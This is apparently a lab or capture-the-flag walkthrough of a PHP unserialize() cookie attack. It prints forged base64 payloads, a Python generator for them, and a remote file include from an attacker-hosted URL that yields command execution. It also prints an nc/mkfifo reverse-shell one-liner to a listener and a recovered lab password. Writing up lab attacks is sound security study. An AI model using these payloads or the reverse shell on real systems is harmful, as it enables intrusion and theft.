1. Scan for the target IP and brute-force directories.
On index.php, open the browser devtools: Network --> Img --> the image request carries a Cookie.
Base64-decode the cookie value:
O:4:"User":2:{s:10:"\0User\0name";s:3:"sk4";s:9:"\0User\0wel";O:7:"Welcome":0:{}}
(The \0 bytes around the class name are how PHP marks private properties; they disappear when the value is copied as text, which is why s:10 shows only the 8 visible characters "Username". Any forged cookie must contain them, or unserialize() rejects the length.)
2. /backup serves a compressed archive; download it and it contains three php files.
Code audit: the cookie is passed to unserialize(), so a payload can be constructed.
Running the generator gives (User::$wel now holds a Log object whose private type_log points at /etc/passwd):
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==
3. Replace /etc/passwd with a file hosted on the attacking machine (the Log class loads whatever path is in type_log, and here the server accepts a URL there).
Running it again gives:
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xOTIuMTY4LjMuMTU1LzExLnBocCI7fX0=
Replace the Cookie with this value.
Request ?cmd=id and the command output is displayed.
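Generating these cookies by hand is error-prone because of the NUL bytes in the private property names. The script below is an added example, not part of the original writeup or of the target's code: it rebuilds the two payloads above (class and property names taken from them; the "\0Class\0prop" form is the assumed private-property encoding) and decodes a cookie with the NUL bytes made visible so the length fields can be checked.

```python
import base64

# Added example (not from the writeup): builds the same PHP-serialized User
# object the writeup sends in the cookie, and decodes/inspects one.
# Class and property names (User, name, wel, Log, type_log) are taken from the
# writeup's own payloads; the "\0Class\0prop" key form is how PHP stores
# private properties and is assumed here to match the target's classes.


def php_str(s: str) -> str:
    """Serialize a PHP string: s:<byte length>:"<bytes>"; (NUL bytes count)."""
    return f's:{len(s.encode())}:"{s}";'


def private_prop(cls: str, prop: str) -> str:
    """Key under which PHP stores a private property: "\\0Class\\0prop"."""
    return f"\0{cls}\0{prop}"


def php_obj(cls: str, props: list[tuple[str, str]]) -> str:
    """Serialize an object: O:<len>:"Class":<n>:{<key><value>...}.
    props is a list of (property name, already-serialized value)."""
    body = "".join(php_str(k) + v for k, v in props)
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def build_payload(type_log: str, username: str = "admin") -> str:
    """User with private name/wel; wel holds a Log whose private type_log is
    the path (or URL) the Log class will load. Returns the base64 cookie."""
    log = php_obj("Log", [(private_prop("Log", "type_log"), php_str(type_log))])
    user = php_obj("User", [
        (private_prop("User", "name"), php_str(username)),
        (private_prop("User", "wel"), log),   # nested object: no ';' after it
    ])
    return base64.b64encode(user.encode()).decode()


def inspect_cookie(cookie_b64: str) -> str:
    """Decode a cookie and show NUL bytes as \\0, so a length field such as
    s:10 can be compared with the characters actually present."""
    raw = base64.b64decode(cookie_b64)
    return raw.decode().replace("\0", "\\0")


if __name__ == "__main__":
    for target in ("/etc/passwd", "http://192.168.3.155/11.php"):
        cookie = build_payload(target)
        print(cookie)
        print(inspect_cookie(cookie))
```

Swap the type_log argument for any other path or URL and paste the printed base64 into the Cookie header; inspect_cookie() is also useful on the original sk4 cookie to see which properties are private before forging it.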
4. Reverse shell
Start a listener on kali (nc -lvnp 7777), then trigger the reverse shell from the webshell.
Replace id with the following (URL-encoded: spaces as +, ; as %3b, & as %26):
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.238.132+7777+>/tmp/f
A shell on the target comes back to the listener.
From there the password is obtained: KywZmnPWW6tTbW5w